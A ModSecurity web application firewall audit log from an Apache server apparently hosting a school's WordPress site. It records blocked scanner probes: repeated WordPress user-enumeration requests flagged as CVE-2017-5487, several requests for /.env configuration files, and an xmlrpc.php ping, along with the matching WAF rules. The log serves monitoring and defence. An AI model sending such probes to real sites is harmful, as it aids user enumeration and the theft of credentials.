1745607427449611 2630 (- - -) Stopwatch2: 1745607427449611 2630; combined=1273, p1=415, p2=821, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1076e374-Z-- --8dd7507e-A-- [26/Apr/2025:02:07:09 +0700] aAvdXeOdEP6frSVs8Cov3QAAAAc 103.236.140.4 59992 103.236.140.4 8181 --8dd7507e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.68.194.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.68.194.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8dd7507e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8dd7507e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745608029554731 2859 (- - -) Stopwatch2: 1745608029554731 2859; combined=1530, p1=486, p2=1007, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8dd7507e-Z-- --f103935e-A-- [26/Apr/2025:02:08:36 +0700] aAvdtOXF4ZX3hX-IbN51bQAAAIg 103.236.140.4 60324 103.236.140.4 8181 --f103935e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.166.26.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.166.26.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f103935e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f103935e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745608116599973 3229 (- - -) Stopwatch2: 1745608116599973 3229; combined=1615, p1=557, p2=1011, p3=0, p4=0, p5=47, sr=161, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f103935e-Z-- --66a56346-A-- [26/Apr/2025:02:25:29 +0700] aAvhqeOdEP6frSVs8CoxGwAAAAI 103.236.140.4 36004 103.236.140.4 8181 --66a56346-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.71 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --66a56346-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66a56346-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745609129593628 3488 (- - -) Stopwatch2: 1745609129593628 3488; combined=1497, p1=512, p2=926, p3=0, p4=0, p5=59, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66a56346-Z-- --d4ec071a-A-- [26/Apr/2025:02:25:37 +0700] aAvhseXF4ZX3hX-IbN52dwAAAJQ 103.236.140.4 36040 103.236.140.4 8181 --d4ec071a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.71 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d4ec071a-C-- demo.sayHello --d4ec071a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4ec071a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745609137647095 6245 (- - -) Stopwatch2: 1745609137647095 6245; combined=4668, p1=580, p2=3825, p3=31, p4=36, p5=113, sr=75, sw=83, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4ec071a-Z-- --20191c5c-A-- [26/Apr/2025:02:42:11 +0700] aAvlk-XF4ZX3hX-IbN539gAAAJM 103.236.140.4 39898 103.236.140.4 8181 --20191c5c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 80.87.128.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 80.87.128.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --20191c5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --20191c5c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745610131960707 3068 (- - -) Stopwatch2: 1745610131960707 3068; combined=1327, p1=436, p2=860, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20191c5c-Z-- --a67dbb64-A-- [26/Apr/2025:02:58:47 +0700] aAvpd-XF4ZX3hX-IbN55nwAAAIQ 103.236.140.4 43776 103.236.140.4 8181 --a67dbb64-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.247.15.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.247.15.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a67dbb64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a67dbb64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745611127710269 2815 (- - -) Stopwatch2: 1745611127710269 2815; combined=1312, p1=439, p2=842, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a67dbb64-Z-- --da999f54-A-- [26/Apr/2025:03:26:43 +0700] aAvwA-OdEP6frSVs8CozYQAAAAA 103.236.140.4 50300 103.236.140.4 8181 --da999f54-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 198.23.217.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 198.23.217.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --da999f54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da999f54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745612803906744 3819 (- - -) Stopwatch2: 1745612803906744 3819; combined=2127, p1=660, p2=1430, p3=0, p4=0, p5=37, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da999f54-Z-- --0d097458-A-- [26/Apr/2025:03:43:14 +0700] aAvz4tDEbIDiBZnoTx75PQAAAFE 103.236.140.4 54266 103.236.140.4 8181 --0d097458-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 35.216.163.43 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 35.216.163.43 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr --0d097458-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d097458-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745613794089180 842 (- - -) Stopwatch2: 1745613794089180 842; combined=365, p1=328, p2=0, p3=0, p4=0, p5=37, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d097458-Z-- --47df3521-A-- [26/Apr/2025:03:55:12 +0700] aAv2sNQ6lpQjDvc0F_Nb9gAAAMc 103.236.140.4 57052 103.236.140.4 8181 --47df3521-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.118.104.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.118.104.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --47df3521-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47df3521-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745614512701591 3093 (- - -) Stopwatch2: 1745614512701591 3093; combined=1351, p1=458, p2=863, p3=0, p4=0, p5=30, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47df3521-Z-- --aa530f54-A-- [26/Apr/2025:04:21:55 +0700] aAv883GCMLWH05JCdxzX7gAAAIc 103.236.140.4 35076 103.236.140.4 8181 --aa530f54-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.12.138 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.12.138 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --aa530f54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa530f54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745616115196046 866 (- - -) Stopwatch2: 1745616115196046 866; combined=382, p1=344, p2=0, p3=0, p4=0, p5=38, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa530f54-Z-- --d928af76-A-- [26/Apr/2025:05:30:15 +0700] aAwM99DEbIDiBZnoTx7_DwAAAEg 103.236.140.4 51152 103.236.140.4 8181 --d928af76-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.191.230.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.191.230.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d928af76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d928af76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745620215261527 3055 (- - -) Stopwatch2: 1745620215261527 3055; combined=1537, p1=502, p2=945, p3=0, p4=0, p5=89, sr=130, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d928af76-Z-- --4b0dce70-A-- [26/Apr/2025:05:31:20 +0700] aAwNONQ6lpQjDvc0F_Nh6AAAAM4 103.236.140.4 51410 103.236.140.4 8181 --4b0dce70-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 142.202.241.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 142.202.241.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4b0dce70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b0dce70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745620280186763 2763 (- - -) Stopwatch2: 1745620280186763 2763; combined=1176, p1=419, p2=717, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b0dce70-Z-- --5af58f10-A-- [26/Apr/2025:05:31:34 +0700] aAwNRnGCMLWH05JCdxzbrwAAAIw 103.236.140.4 51456 103.236.140.4 8181 --5af58f10-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 205.196.221.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 205.196.221.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5af58f10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5af58f10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745620294622769 2689 (- - -) Stopwatch2: 1745620294622769 2689; combined=1344, p1=412, p2=902, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5af58f10-Z-- --50b0fd7f-A-- [26/Apr/2025:05:36:54 +0700] aAwOhtQ6lpQjDvc0F_NiOAAAANc 103.236.140.4 52692 103.236.140.4 8181 --50b0fd7f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0 Accept-Charset: utf-8 --50b0fd7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50b0fd7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745620614965350 837 (- - -) Stopwatch2: 1745620614965350 837; combined=376, p1=336, p2=0, p3=0, p4=0, p5=39, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50b0fd7f-Z-- --50abc372-A-- [26/Apr/2025:05:56:33 +0700] aAwTIdDEbIDiBZnoTx4AgAAAAFg 103.236.140.4 57224 103.236.140.4 8181 --50abc372-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.92.38 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.92.38 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --50abc372-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50abc372-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745621793011232 659 (- - -) Stopwatch2: 1745621793011232 659; combined=268, p1=237, p2=0, p3=0, p4=0, p5=31, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50abc372-Z-- --ddeaf071-A-- [26/Apr/2025:05:56:38 +0700] aAwTJtDEbIDiBZnoTx4AhAAAAEY 103.236.140.4 57244 103.236.140.4 8181 --ddeaf071-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.92.38 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.92.38 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --ddeaf071-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ddeaf071-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745621798159570 824 (- - -) Stopwatch2: 1745621798159570 824; combined=368, p1=329, p2=0, p3=0, p4=0, p5=39, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ddeaf071-Z-- --0fce2e11-A-- [26/Apr/2025:06:15:21 +0700] aAwXidQ6lpQjDvc0F_NkCAAAANQ 103.236.140.4 33304 103.236.140.4 8181 --0fce2e11-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G950U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --0fce2e11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fce2e11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745622921462064 814 (- - -) Stopwatch2: 1745622921462064 814; combined=385, p1=346, p2=0, p3=0, p4=0, p5=39, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fce2e11-Z-- --0f8e4803-A-- [26/Apr/2025:06:56:12 +0700] aAwhHNQ6lpQjDvc0F_NnCAAAANY 103.236.140.4 42720 103.236.140.4 8181 --0f8e4803-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.255.223.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.255.223.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0f8e4803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; 